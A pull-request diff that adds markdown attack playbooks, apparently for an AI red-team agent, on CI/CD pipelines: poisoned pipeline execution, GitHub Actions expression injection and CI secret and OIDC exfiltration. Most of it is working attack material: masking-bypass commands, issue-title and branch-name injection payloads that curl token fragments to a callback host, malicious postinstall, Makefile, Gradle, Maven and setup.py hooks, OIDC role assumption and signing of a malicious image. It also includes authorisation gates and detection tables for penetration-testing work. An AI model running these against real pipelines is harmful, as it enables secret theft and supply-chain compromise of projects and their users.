### PR TITLE
feat(skills): CI/CD pipeline attack playbooks (PPE, GitHub Actions injection, self-hosted runner abuse, secrets exfil)

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/exploit/cicd/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/cicd/SKILL.md
@@ -1,0 +1,110 @@
+---
+name: cicd
+description: "CI/CD pipeline attack category — poisoned pipeline execution, GitHub Actions expression injection, self-hosted runner abuse, secrets/OIDC exfil. Routing skill: fingerprint the CI provider + workflow surface, then load the matching leaf."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reconnaissance
+  when_to_use: "ci cd pipeline github actions gitlab ci jenkins circleci buildkite drone azure devops travis workflow runner secrets oidc ppe pipeline injection"
+  tags: ci-cd, supply-chain, pipeline, github-actions, runner
+  mitre_attack: T1195, T1199, T1078, T1554
+---
+
+# CI/CD Pipeline Exploitation — Category Overview
+
+Routing skill for attacks against build / deployment pipelines. Pipelines run attacker-influenced code (PRs, dependencies, build scripts) with privileged tokens, cloud OIDC, and write access to artifacts that downstream consumers trust. Compromise of a single pipeline often equals compromise of every release built by it.
+
+## Sub-Skills
+
+| Sub-Skill | Covers | When to Load |
+|---|---|---|
+| **poisoned-pipeline-execution** | Direct + Indirect PPE: injecting commands via attacker-controllable build files (`Makefile`, `package.json` scripts, `build.gradle`, `Dangerfile`, `.pre-commit-config.yaml`), `pull_request_target` abuse, fork-PR build triggers, dependency/test-script execution. | Target builds untrusted PR code; you can land a malicious file or dependency. | `load_skill("/skills/standard/exploit/cicd/poisoned-pipeline-execution/SKILL.md")` |
+| **github-actions-injection** | `${{ }}` template injection via untrusted context (issue/PR title, body, branch name, commit message) into `run:` steps, `pull_request_target` + PR-head checkout, `GITHUB_TOKEN` permission abuse, artifact/cache poisoning, action pinning (tag vs SHA). | Target uses GitHub Actions and accepts external contributors. | `load_skill("/skills/standard/exploit/cicd/github-actions-injection/SKILL.md")` |
+| **self-hosted-runner-abuse** | Non-ephemeral runner persistence, fork-PR job execution on self-hosted, runner-label targeting, secret theft from runner env, lateral movement into internal network / cloud metadata. | Target advertises self-hosted runners (workflow `runs-on:` label or public job logs). | `load_skill("/skills/standard/exploit/cicd/self-hosted-runner-abuse/SKILL.md")` |
+| **cicd-secrets-exfil** | Extracting CI secrets / OIDC tokens: `echo` / `printenv` exfil, masking bypass (base64, char-split), OIDC -> cloud role assumption, `GITHUB_TOKEN` / `CI_JOB_TOKEN` scope abuse, cache / artifact secret leakage. | You already have code execution in a CI job; need to convert it into durable cloud / registry access. | `load_skill("/skills/standard/exploit/cicd/cicd-secrets-exfil/SKILL.md")` |
+
+## Provider fingerprinting
+
+```bash
+# GitHub Actions
+ls -la <REPO>/.github/workflows/ 2>/dev/null
+gh api "repos/<OWNER>/<REPO>/actions/workflows" --jq '.workflows[] | {name,path,state}'
+
+# GitLab CI
+test -f <REPO>/.gitlab-ci.yml && echo "GitLab CI"
+ls <REPO>/.gitlab/ci/ 2>/dev/null
+
+# Jenkins
+test -f <REPO>/Jenkinsfile && echo "Jenkins"; find <REPO> -name 'Jenkinsfile*' -type f
+
+# CircleCI / Buildkite / Drone / Azure / Travis
+for f in .circleci/config.yml .buildkite/pipeline.yml .drone.yml azure-pipelines.yml .travis.yml; do
+  test -f "<REPO>/$f" && echo "$f"
+done
+
+# Provider hints in README / badges
+grep -RhoE 'github\.com/[^/]+/[^/]+/actions|gitlab\.com/[^/]+/[^/]+/-/pipelines|circleci\.com/gh/|app\.travis-ci\.com' <REPO> 2>/dev/null | sort -u
+```
+
+## Workflow file recon (GitHub Actions example)
+
+```bash
+# Local checkout
+find <REPO>/.github/workflows -type f \( -name '*.yml' -o -name '*.yaml' \) -print
+
+# Remote, no clone needed
+gh api "repos/<OWNER>/<REPO>/contents/.github/workflows" --jq '.[].name'
+
+# Pull every workflow at HEAD
+for wf in $(gh api "repos/<OWNER>/<REPO>/contents/.github/workflows" --jq '.[].path'); do
+  echo "=== $wf ==="
+  gh api "repos/<OWNER>/<REPO>/contents/$wf" --jq '.content' | base64 -d
+done
+```
+
+## Risky-surface triage
+
+| Signal | Why it matters | Grep |
+|---|---|---|
+| `pull_request_target:` trigger | Runs with write `GITHUB_TOKEN` + secrets while checking out attacker code | `grep -rE '^\s*pull_request_target\s*:' .github/workflows/` |
+| `actions/checkout` with `ref: ${{ github.event.pull_request.head.sha }}` under `pull_request_target` | Pulls attacker code with privileged context | `grep -rE 'pull_request\.head' .github/workflows/` |
+| `${{ github.event.* }}` interpolated into a `run:` block | Expression injection sink (issue/PR body, title, branch name, commit msg) | `grep -rE '\$\{\{\s*github\.event\.(issue\|pull_request\|comment\|head_commit)' .github/workflows/` |
+| `runs-on: [self-hosted, ...]` on public repo | Self-hosted runner reachable from fork PRs | `grep -rE 'runs-on:\s*(\[\s*self-hosted\|self-hosted)' .github/workflows/` |
+| Third-party action pinned by tag (`@v3`) instead of SHA | Action repo / tag retargeting → silent supply-chain | `grep -rE 'uses:\s*[^/]+/[^@]+@v?[0-9]' .github/workflows/` |
+| `permissions:` block missing or `write-all` | Token over-scoped; abuse to push to protected branches, publish releases | `grep -rE 'permissions:|write-all' .github/workflows/` |
+
+## Secret-exposure surface
+
+```bash
+# Secrets and OIDC references — every line is a potential exfil target once you have RCE in a job
+grep -rnE 'secrets\.|vars\.|env\.[A-Z_]+_TOKEN|env\.[A-Z_]+_KEY|id-token:\s*write|configure-aws-credentials|google-github-actions/auth' .github/workflows/
+
+# Exposed in public job logs (replays)
+gh run list --repo <OWNER>/<REPO> --limit 20 --json databaseId,name,status,conclusion
+gh run view <RUN_ID> --repo <OWNER>/<REPO> --log | grep -iE 'token|secret|password|aws_|gcp_|azure_' | head
+```
+
+## Tooling
+
+| Tool | Use |
+|---|---|
+| `gh` (GitHub CLI) | Recon, workflow listing, run/log inspection, PR creation |
+| `gato` / `gato-x` (praetorian-inc) | GitHub Actions attack toolkit — self-hosted runner enum, PPE, secret exfil chains |
+| `actionlint` | Local lint that flags many injection sinks — defenders use it; you can read its rules to find sinks |
+| `octoscan` / `zizmor` | Static scanners for GitHub Actions security issues |
+| `tj-actions-changed-files` CVE class (CVE-2025-30066) | Known compromised-action precedent; pattern to look for in any third-party action |
+| Burp Collaborator / `interactsh` | DNS / HTTP beacon for non-destructive PoC of code execution on a runner |
+
+## Decision gate
+
+Before any active test, confirm in writing:
+
+1. The target program explicitly allows CI/CD testing (many programs scope this out — "infrastructure", "third-party CI" exclusions are common).
+2. PoC will use a **beacon-only** payload (DNS / HTTP callback). Do not exfiltrate real secrets to attacker-controlled storage; print the first 4 chars of a token to prove access, then stop.
+3. Any malicious branch / PR / fork is clearly labeled `security-research` and is deletable on request.
+4. You will not push to protected branches, publish artifacts, or assume cloud roles. Prove the *capability*, do not exercise it.
+
+## Cross-references
+
+- Supply-chain catalog: `/skills/standard/exploit/supplychain/SKILL.md`
+- OPSEC + scope discipline: `/skills/shared/opsec/SKILL.md`
+- Cloud OIDC follow-on: cloud / IAM enumeration skills after a successful OIDC token exchange

--- a/packages/decepticon/decepticon/skills/standard/exploit/cicd/cicd-secrets-exfil/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/cicd/cicd-secrets-exfil/SKILL.md
@@ -1,0 +1,198 @@
+---
+name: cicd-secrets-exfil
+description: "Extracting CI secrets / OIDC tokens once you have code execution in a build job — echo/printenv exfil, log-masking bypass (base64, char-split, reversal), OIDC token abuse to assume cloud roles, GITHUB_TOKEN / CI_JOB_TOKEN scope abuse, cache / artifact secret leakage, provenance pivot."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: credential-access
+  when_to_use: "ci secrets exfil printenv masking bypass oidc id-token aws assume-role gcp workload identity azure github_token ci_job_token cache artifact"
+  tags: ci-cd, secrets, oidc, credential-access
+  mitre_attack: T1552.001, T1552.007, T1078.004, T1528
+---
+
+# CI/CD Secrets & OIDC Exfiltration
+
+Pre-requisite: you already have code execution in a CI job (see `poisoned-pipeline-execution/` or `github-actions-injection/`). Goal: convert that ephemeral execution into durable cloud / registry access without tripping log masking.
+
+## Surface map
+
+```bash
+# In the runner — every place a secret might live
+env | grep -iE 'token|secret|password|key|aws_|gcp_|azure_|registry|npm_|pypi_|dockerhub' | head
+ls -la "$HOME/.docker/config.json" "$HOME/.aws/credentials" "$HOME/.kube/config" "$HOME/.netrc" 2>/dev/null
+ls -la "$RUNNER_TEMP/_github_workflow/" 2>/dev/null
+cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -iE 'token|secret' | sort -u | head
+```
+
+## Log masking — and how it fails
+
+GitHub Actions, GitLab CI, CircleCI mask declared secrets in job logs by replacing exact substrings with `***`. The mask is **substring-based, applied post-write, to UTF-8 chars only**. Defeats trivially:
+
+```bash
+SECRET="$MY_SECRET"
+
+# 1. Base64 — masker doesn't decode
+echo "$SECRET" | base64 -w0
+
+# 2. Hex
+echo -n "$SECRET" | xxd -p
+
+# 3. Char-by-char (one char per line)
+echo "$SECRET" | fold -w1
+
+# 4. Reverse
+echo "$SECRET" | rev
+
+# 5. Print length + first/last chars (use this for *proof*; don't print the whole secret)
+echo "len=${#SECRET} first4=${SECRET:0:4} last4=${SECRET: -4}"
+
+# 6. Split across two strings
+echo "${SECRET:0:${#SECRET}/2}"; echo "${SECRET:${#SECRET}/2}"
+
+# 7. Use as URL — DNS exfil masks the secret in HTTP logs but the lookup succeeds
+curl -s "https://$(echo -n "$SECRET" | base64 -w0 | tr -d = | head -c 60).<COLLAB>/"
+
+# 8. Out-of-band — write to artifact then download
+echo "$SECRET" | base64 > "$RUNNER_TEMP/proof.b64"
+# then: actions/upload-artifact -> attacker downloads
+```
+
+**For authorized research: stop at step 5.** Length + first 4 + last 4 chars is enough to prove access; do not move the full secret to attacker infrastructure.
+
+## What lives in `env`
+
+```bash
+# GitHub Actions
+# - GITHUB_TOKEN — workflow token (scope depends on `permissions:` block, default depends on org)
+# - secrets.* — explicitly referenced; only present if the step mapped them
+# - ACTIONS_RUNTIME_TOKEN — runner-to-service JWT, scoped to runtime APIs (artifacts, cache)
+# - ACTIONS_ID_TOKEN_REQUEST_TOKEN + ACTIONS_ID_TOKEN_REQUEST_URL — OIDC exchange endpoints
+# - ACTIONS_CACHE_URL — cache service endpoint
+
+# GitLab CI
+# - CI_JOB_TOKEN — short-lived job token, scope depends on project + CI/CD settings
+# - CI_REGISTRY_USER / CI_REGISTRY_PASSWORD — container registry
+# - CI_DEPENDENCY_PROXY_USER / _PASSWORD
+
+# CircleCI
+# - CIRCLE_OIDC_TOKEN, CIRCLE_TOKEN
+```
+
+## GitHub OIDC -> cloud role
+
+If the workflow declares `permissions: id-token: write`, the runner can mint a JWT trusted by AWS / GCP / Azure / Vault that maps to a cloud role. With code execution, you can mint it yourself even if no later step uses it:
+
+```bash
+# Mint an OIDC token from inside the job
+ID_TOKEN=$(curl -sH "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
+  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r .value)
+
+# Inspect claims (no secret — JWT is base64)
+echo "$ID_TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | jq .
+# Claims include: sub (repo:OWNER/REPO:ref:refs/heads/...), iss, aud, repository, workflow
+
+# AWS — assume role if trust policy matches the sub claim
+aws sts assume-role-with-web-identity \
+  --role-arn "$AWS_ROLE_ARN" \
+  --role-session-name research \
+  --web-identity-token "$ID_TOKEN" \
+  --duration-seconds 900 \
+  | jq '{AccessKeyId:.Credentials.AccessKeyId[0:6]+"...", Expiration:.Credentials.Expiration}'
+
+# GCP — exchange for a Google access token via Workload Identity Federation
+# (requires the WIF pool/provider to trust the GitHub OIDC issuer)
+```
+
+**Trust-policy enumeration without burning a session**: the OIDC `sub` claim is deterministic — `repo:OWNER/REPO:ref:refs/heads/BRANCH` or `:environment:NAME`. If you can read the trust policy (cross-account roles are sometimes enumerable via `iam:GetRole` from a low-priv key), you can predict which `(repo, ref)` will pass.
+
+## `GITHUB_TOKEN` abuse
+
+```bash
+# What can this token do? (no secret leaked — just header inspection)
+curl -sI -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/ | grep -i x-oauth-scopes
+gh api /repos/$GITHUB_REPOSITORY --jq '.permissions'
+
+# Common abuses given `contents: write` + `pull-requests: write`
+gh release create v0.0.0-poc --notes "research" --target $GITHUB_SHA            # creates a release
+gh pr merge <N> --merge                                                          # merges a PR
+git push "https://x-access-token:$GITHUB_TOKEN@github.com/$GITHUB_REPOSITORY" HEAD:refs/heads/research
+
+# packages: write -> push a container to ghcr.io tagged as a "release"
+echo "$GITHUB_TOKEN" | docker login ghcr.io -u "$GITHUB_ACTOR" --password-stdin
+```
+
+`GITHUB_TOKEN` is short-lived (job duration) and not exfilable to durable infra — but within the job it can mutate the repo, releases, packages, deployments. That mutation is the persistence.
+
+## GitLab `CI_JOB_TOKEN`
+
+```bash
+# Job-token API surface — package registry, container registry, releases, child pipelines
+curl -s --header "JOB-TOKEN: $CI_JOB_TOKEN" \
+  "$CI_API_V4_URL/projects/$CI_PROJECT_ID/packages"
+
+# If "CI/CD Job Token allowlist" is disabled (default historically), this token can access
+# OTHER projects in the same group — cross-project pivot
+curl -s --header "JOB-TOKEN: $CI_JOB_TOKEN" \
+  "$CI_API_V4_URL/projects/<OTHER_PROJECT_ID>/repository/files/Dockerfile/raw?ref=main"
+```
+
+## Cache / artifact secret leakage
+
+```bash
+# Cache key collisions — a base-branch job that wrote a cache containing creds, restored by a PR job
+# Look for caches that include $HOME/.docker, $HOME/.aws, $HOME/.npmrc, ~/.gradle
+gh api "repos/$GITHUB_REPOSITORY/actions/caches" --jq '.actions_caches[] | {key,size_in_bytes,ref}'
+
+# Inside the job — list restored cache contents
+ls -la "$HOME/.cache" "$HOME/.gradle" "$HOME/.m2" "$HOME/.npm" 2>/dev/null
+grep -RhE '^[A-Z_]+=.+(token|secret|key|password)' "$HOME"/.{npmrc,pypirc,gradle,m2,docker} 2>/dev/null | head
+
+# Artifacts from a sibling job often contain build logs with masked-but-bypassable secrets
+gh run download <RUN_ID> --repo $GITHUB_REPOSITORY -n build-logs
+grep -RhE '(AKIA|ghp_|gho_|ghu_|ghs_|ghr_|xox[baprs]-|eyJ[A-Za-z0-9_-]{20,})' .
+```
+
+## Provenance / supply-chain pivot
+
+Once you can mint an OIDC token + push to ghcr.io / npm / PyPI as the project, you can sign artifacts via `cosign` / `sigstore` with the project's identity. Downstream consumers that verify signatures will accept malicious releases:
+
+```bash
+# Sign a malicious image with the project's OIDC identity (Sigstore keyless)
+COSIGN_EXPERIMENTAL=1 cosign sign --yes "ghcr.io/$GITHUB_REPOSITORY:malicious"
+```
+
+This is exactly the chain SLSA L3 is meant to prevent and what the `tj-actions/changed-files` incident exercised end-to-end.
+
+## Detection signatures
+
+| Signal | Source |
+|---|---|
+| Outbound DNS with high-entropy subdomain from a runner | DNS firewall (Cisco Umbrella, NextDNS, internal) |
+| `base64`, `xxd`, `rev`, `fold -w1`, `${VAR:0:1}` in a `run:` step | step-log scanner (rare in defender stacks; opportunity) |
+| OIDC `assume-role-with-web-identity` from a new `(repo, ref)` pair | CloudTrail `AssumeRoleWithWebIdentity` events |
+| `GITHUB_TOKEN` releasing/tagging/merging from a non-release workflow | branch-protection audit, GH audit log |
+| Artifact / cache containing dotfile dirs (`.docker`, `.aws`) | cache-policy lint |
+
+## Tools
+
+| Tool | Use |
+|---|---|
+| `trufflehog` | Post-hoc scan of repo / job logs for leaked credentials |
+| `gitleaks` | Pre-commit + log-scan equivalent |
+| `gato-x secrets` | Automates the print + masking-bypass loop |
+| `cosign` / `sigstore` | Signing pivot once OIDC + push rights are in hand |
+| `aws-vault`, `gcloud auth` | Local validation of exchanged credentials (against research accounts only) |
+
+## Decision gate
+
+1. **Print proof, not the secret.** `len + first4 + last4` is enough. Anything more requires explicit written authorization for credential extraction.
+2. **Do not exchange OIDC for cloud credentials** unless the engagement scope names the cloud account and the action explicitly authorizes role assumption. Demonstrate the *capability* by minting the token and decoding the claims locally — that proves the trust path without burning a session.
+3. **Do not push artifacts** (releases, packages, container tags) even if the token allows it. Document the capability with a dry-run (`--dry-run`, `gh release create ... --draft` on a research repo).
+4. Scrub any artifact / cache you created during the test before declaring done.
+
+## References
+
+- GitHub docs — "About security hardening with OpenID Connect"
+- CICD-SEC-06 — "Insufficient Credential Hygiene" (OWASP)
+- Synacktiv — "GitHub Actions: Masking secrets is not enough"
+- Adnan Khan — Sigstore + GHA OIDC pivot writeups
+- `tj-actions/changed-files` (CVE-2025-30066) — end-to-end OIDC + masking-bypass chain in the wild

--- a/packages/decepticon/decepticon/skills/standard/exploit/cicd/github-actions-injection/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/cicd/github-actions-injection/SKILL.md
@@ -1,0 +1,200 @@
+---
+name: github-actions-injection
+description: "GitHub Actions ${{ }} expression injection — attacker-controlled context (issue/PR title, body, branch name, commit message) substituted into run: steps, unsafe pull_request_target + PR-head checkout, GITHUB_TOKEN scope abuse, artifact/cache poisoning, action tag-vs-SHA pinning."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  when_to_use: "github actions expression injection script injection pull_request_target github_token actions/checkout artifact cache action pinning sha tag"
+  tags: ci-cd, github-actions, expression-injection, script-injection
+  mitre_attack: T1059, T1078.004, T1554
+---
+
+# GitHub Actions Expression Injection
+
+`${{ <expr> }}` is interpolated by the runner **before** the shell sees the line. If the expression sources from untrusted `github.event.*`, the substituted text is parsed by `bash` (or `pwsh`) as code — full RCE on the runner, with whatever token + secrets the job exposes.
+
+## Untrusted context — the sinks
+
+These fields are attacker-controllable in fork PRs, issues, comments, branches:
+
+| Context | Source | Notes |
+|---|---|---|
+| `github.event.issue.title` / `.body` | issue create / edit | any logged-in user |
+| `github.event.pull_request.title` / `.body` | PR create / edit | any forker |
+| `github.event.pull_request.head.ref` | branch name on fork | `;` `$()` `\`` are valid Git branch chars |
+| `github.event.comment.body` | issue/PR comment | broad reach |
+| `github.event.review.body` / `.review_comment.body` | PR review | |
+| `github.event.head_commit.message` / `.commits[*].message` | push / PR | newlines allowed |
+| `github.event.pages[*].page_name` | `gollum` wiki | |
+| `github.head_ref` | shorthand for PR head branch | same as above |
+
+## Recon — find injection sinks
+
+```bash
+# Direct ${{ }} into run: blocks
+grep -rnE '\$\{\{\s*github\.(event\.(issue|pull_request|comment|review|head_commit|pages)|head_ref)' \
+  <REPO>/.github/workflows/
+
+# actionlint flags most of these
+docker run --rm -v "$PWD:/repo" rhysd/actionlint:latest -color
+```
+
+## Sink pattern — the vulnerable workflow
+
+```yaml
+# VULNERABLE
+on: [issues, pull_request_target]
+jobs:
+  triage:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Echo title
+        run: |
+          echo "New issue: ${{ github.event.issue.title }}"   # <-- sink
+```
+
+## Exploit payload — issue title
+
+Open an issue titled:
+
+```
+hello"; curl -s https://<COLLAB>/$(printf %s "$GITHUB_TOKEN" | base64 -w0 | head -c 12) #
+```
+
+Runner expands to:
+
+```bash
+echo "New issue: hello"; curl -s https://<COLLAB>/$(printf %s "$GITHUB_TOKEN" | base64 -w0 | head -c 12) #"
+```
+
+The shell runs `curl` with the first 12 base64-chars of `GITHUB_TOKEN` as the URL path. (PoC pattern — truncate; **do not** exfil the full token.)
+
+## Branch-name injection
+
+```bash
+# Fork → create branch with a shell-meta name
+git checkout -b 'x";curl -s https://<COLLAB>/$(id)#'
+git commit --allow-empty -m bn
+git push origin HEAD
+gh pr create --title typo --body typo --repo <OWNER>/<REPO>
+```
+
+If any workflow does `echo ${{ github.head_ref }}` in a `run:`, the runner executes `id` and posts the result.
+
+## `pull_request_target` + PR-head checkout
+
+```yaml
+# VULNERABLE
+on: pull_request_target
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with: { ref: ${{ github.event.pull_request.head.sha }} }
+      - run: npm ci && npm test
+```
+
+Two attack paths on the same workflow:
+
+1. **Code execution** — fork edits `package.json` `postinstall` (see `poisoned-pipeline-execution/SKILL.md`).
+2. **Expression injection** — fork edits its own workflow files? No — workflow files on the base ref run, not PR head. But any `${{ github.event.* }}` sink in the base workflow is still exploitable via title / body / branch name.
+
+## Safe pattern (defender)
+
+```yaml
+# Pass via env, never interpolate directly
+- name: Echo title
+  env:
+    ISSUE_TITLE: ${{ github.event.issue.title }}
+  run: echo "New issue: $ISSUE_TITLE"
+```
+
+`$ISSUE_TITLE` is expanded by `bash` only — shell-meta inside `$ISSUE_TITLE` becomes literal text. Note this still requires `set -u` or careful quoting; double-quote the variable.
+
+## `GITHUB_TOKEN` permission abuse
+
+If the workflow does not set `permissions:` explicitly, the token defaults to whatever the repo / org default is — historically `read-all` / `write-all`. With write scope you can:
+
+```bash
+# From inside the runner — push to a release branch via the token
+git remote set-url origin "https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git"
+git push origin HEAD:refs/heads/release/x
+
+# Create a release
+gh release create v0.0.0-poc --notes "research" --target $GITHUB_SHA
+
+# Approve + merge a PR (if `contents: write` + `pull-requests: write`)
+gh pr merge <N> --merge --admin
+```
+
+Always check the effective scope:
+
+```bash
+# Inside the job — see what the token can do
+curl -sI -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/ | grep -i x-oauth-scopes
+gh api /repos/$GITHUB_REPOSITORY --jq '.permissions'
+```
+
+## Artifact / cache poisoning
+
+`actions/cache` keys are scoped by repo + branch. A PR job that restores a cache the base branch wrote can be made to write malicious content for the next base-branch run when `pull_request_target` is in play. Same for `actions/upload-artifact` followed by a deploy job that downloads + executes.
+
+```yaml
+# Smell — artifact used as build input without integrity check
+- uses: actions/download-artifact@v4
+  with: { name: build }
+- run: ./build/release.sh   # <- if attacker poisoned `build`, this runs attacker code
+```
+
+## Third-party action pinning
+
+```yaml
+# Tag-pinned — silently movable by the action author or anyone who hijacks the repo
+- uses: tj-actions/changed-files@v44
+
+# SHA-pinned — immutable
+- uses: tj-actions/changed-files@a284dc1814e3fd07f2e34267fc8f81227ed29fb8
+```
+
+`tj-actions/changed-files` (CVE-2025-30066, Mar 2025) shipped a malicious commit retagged onto previously-trusted tags, exfiltrating secrets from every downstream consumer. Pattern recurs — assume every tag-pinned third-party action is a supply-chain risk.
+
+```bash
+# List every third-party action and its pin style across the org
+gh api "search/code?q=uses+org:<OWNER>+path:.github/workflows" --jq '.items[].path' \
+  | xargs -I{} gh api "repos/<OWNER>/<REPO>/contents/{}" --jq '.content' \
+  | base64 -d | grep -E 'uses:\s*[^/]+/[^@]+@'
+```
+
+## Detection signatures
+
+| Signal | Defender view |
+|---|---|
+| `${{ github.event.*.title \| .body \| .ref \| .message }}` in `run:` | static lint (actionlint, zizmor) |
+| Branch name containing shell metas (`;`, `$(`, backtick) | pre-receive hook on the org |
+| `pull_request_target` + `actions/checkout` with `head.sha`/`head.ref` | zizmor rule `dangerous-checkout` |
+| Token scopes `write-all` w/ no `permissions:` block | repo / org default token policy |
+| Tag-pinned third-party action | `dependabot.yml` action-update review |
+
+## Tools
+
+| Tool | Use |
+|---|---|
+| `actionlint` | First-line static check; flags 90% of expression-injection sinks |
+| `zizmor` (woodruffw) | Rust-based audit, catches `pull_request_target` + checkout patterns |
+| `octoscan` | Workflow scanner with PoC generation hints |
+| `gh` CLI | Inspect runs, logs, token scopes, approve fork-PR runs |
+| `gato-x` (praetorian-inc) | End-to-end PPE / expression-injection automation |
+
+## Decision gate
+
+1. Open the PoC issue / PR from a research account on a research fork; payload truncates the token to first 8-12 chars only.
+2. Use `interactsh` / Burp Collaborator for the beacon. Do not POST the token anywhere durable.
+3. Close + delete the issue, branch, and any artifact the run produced once the screenshot is captured.
+
+## References
+
+- GitHub Security Lab — "Keeping your GitHub Actions and workflows secure"
+- "Untrusted input" sink list — github.com/github/securitylab/issues
+- `tj-actions/changed-files` (CVE-2025-30066) post-mortem
+- Synacktiv, NCC Group, Praetorian — Actions injection writeups

--- a/packages/decepticon/decepticon/skills/standard/exploit/cicd/poisoned-pipeline-execution/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/cicd/poisoned-pipeline-execution/SKILL.md
@@ -1,0 +1,190 @@
+---
+name: poisoned-pipeline-execution
+description: "Poisoned Pipeline Execution (PPE) — direct + indirect: inject commands via attacker-controllable build files (Makefile, package.json scripts, build.gradle, Dangerfile, .pre-commit-config.yaml), abuse pull_request_target / fork-PR triggers, and ride dependency / test-script execution on CI."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  when_to_use: "ppe poisoned pipeline direct indirect ppe fork pr pull_request_target makefile package.json npm scripts gradle dangerfile pre-commit ci build script"
+  tags: ci-cd, ppe, pipeline, execution
+  mitre_attack: T1195.002, T1199, T1059
+---
+
+# Poisoned Pipeline Execution (PPE)
+
+PPE = run attacker code inside the target's CI job by editing files the pipeline already executes. Two flavors (Palawan / CIDER taxonomy):
+
+- **Direct PPE (D-PPE)**: attacker edits the *pipeline config itself* (`.github/workflows/*.yml`, `.gitlab-ci.yml`, `Jenkinsfile`) in a PR/branch the CI runs.
+- **Indirect PPE (I-PPE)**: attacker edits a file the *pipeline calls* — build scripts (`Makefile`, `build.gradle`, `pom.xml`), package-manager scripts (`package.json` `scripts`, `setup.py`), lint/test hooks (`Dangerfile`, `.pre-commit-config.yaml`, `tox.ini`, `pyproject.toml` `[tool.poetry.scripts]`), or any file `make test` ends up sourcing.
+
+## Recon — does the target build untrusted code?
+
+```bash
+# 1. Workflow triggers that build PRs
+grep -rE '^\s*(pull_request|pull_request_target)\s*:' <REPO>/.github/workflows/ 2>/dev/null
+
+# 2. Does CI install + run scripts before any review gate?
+grep -rnE 'npm (ci|install|test|run)|yarn|pnpm|pip install|poetry install|make |gradle|mvn |tox' <REPO>/.github/workflows/ <REPO>/.gitlab-ci.yml 2>/dev/null
+
+# 3. Are forks allowed? (default: yes on public repos)
+gh api "repos/<OWNER>/<REPO>" --jq '{visibility,fork,allow_forking,default_branch}'
+
+# 4. Does a maintainer have to approve fork-PR workflow runs? (org/repo setting)
+gh api "repos/<OWNER>/<REPO>/actions/permissions" --jq '.allowed_actions,.enabled' 2>/dev/null
+# Default for public repos: first-time contributors require approval; returning contributors don't.
+```
+
+## Direct PPE — edit the workflow itself
+
+```yaml
+# Attacker branch: feature/innocent-typo-fix
+# .github/workflows/ci.yml — add a step that exfils env
+name: CI
+on: [push, pull_request]
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: "fix: tweak test runner"   # blends in
+        run: |
+          # Beacon-only PoC — DO NOT exfil real secrets in research
+          curl -sX POST "https://<COLLAB>/$(echo -n "$GITHUB_REPOSITORY" | base64)" \
+            -d "ref=$GITHUB_REF"
+```
+
+D-PPE works when the workflow runs on `pull_request` from forks **without** the "require approval" gate, or when the attacker has push access to a branch CI builds.
+
+## Indirect PPE — edit a file the pipeline calls
+
+### package.json scripts
+
+```jsonc
+// PR diff — adds a postinstall that fires when CI runs `npm ci`
+{
+  "scripts": {
+    "test": "jest",
+    "postinstall": "node -e \"require('dns').lookup(require('crypto').randomBytes(6).toString('hex')+'.<COLLAB>',()=>{})\""
+  }
+}
+```
+
+`npm ci` / `npm install` will execute `postinstall` by default. Same trick works with `preinstall`, `prepare`, `prepublish`. Yarn / pnpm honor the same hooks.
+
+### Makefile / `make test`
+
+```make
+# PR adds an indented line under the existing `test:` target
+test:
+	pytest -q
+	@curl -s "https://<COLLAB>/make-test-$$(hostname)" >/dev/null || true
+```
+
+### Gradle / Maven
+
+```groovy
+// build.gradle — runs at evaluation, before any task
+allprojects {
+  doFirst {
+    "curl -s https://<COLLAB>/gradle".execute()
+  }
+}
+```
+
+```xml
+<!-- pom.xml — exec-maven-plugin attached to validate phase -->
+<plugin>
+  <groupId>org.codehaus.mojo</groupId><artifactId>exec-maven-plugin</artifactId>
+  <executions><execution><phase>validate</phase>
+    <goals><goal>exec</goal></goals>
+    <configuration><executable>curl</executable>
+      <arguments><argument>-s</argument><argument>https://<COLLAB>/mvn</argument></arguments>
+    </configuration>
+  </execution></executions>
+</plugin>
+```
+
+### Danger / pre-commit / lint hooks
+
+```ruby
+# Dangerfile — runs on every PR in many JS/iOS pipelines
+`curl -s https://<COLLAB>/danger`
+```
+
+```yaml
+# .pre-commit-config.yaml — points to attacker-controlled repo
+repos:
+  - repo: https://github.com/<ATTACKER>/innocent-lint
+    rev: main
+    hooks: [{ id: lint }]
+```
+
+### setup.py / pyproject.toml
+
+```python
+# setup.py — runs at `pip install .` time
+from setuptools import setup
+import os; os.system("curl -s https://<COLLAB>/setuppy")
+setup(name="x", version="0.0.0")
+```
+
+### Test fixtures
+
+`conftest.py`, `jest.setup.js`, `karma.conf.js`, `cypress/support/index.js`, `phpunit.xml` bootstrap files — all execute before the first test runs.
+
+## `pull_request_target` — the dangerous trigger
+
+`pull_request_target` runs in the **base** repo context with secrets and a write `GITHUB_TOKEN`, but if the workflow then checks out the **PR head**, the attacker's code runs privileged:
+
+```yaml
+# VULNERABLE — DO NOT WRITE THIS
+on: pull_request_target
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with: { ref: ${{ github.event.pull_request.head.sha }} }   # <-- attacker code
+      - run: npm ci && npm test                                    # <-- runs attacker code with secrets in env
+```
+
+A fork PR adding an `postinstall` to `package.json` now runs with `secrets.*` available.
+
+## Chains
+
+| Chain | Pivot |
+|---|---|
+| I-PPE in a build script -> `printenv` -> CI secret -> deploy creds | See `cicd-secrets-exfil/SKILL.md` |
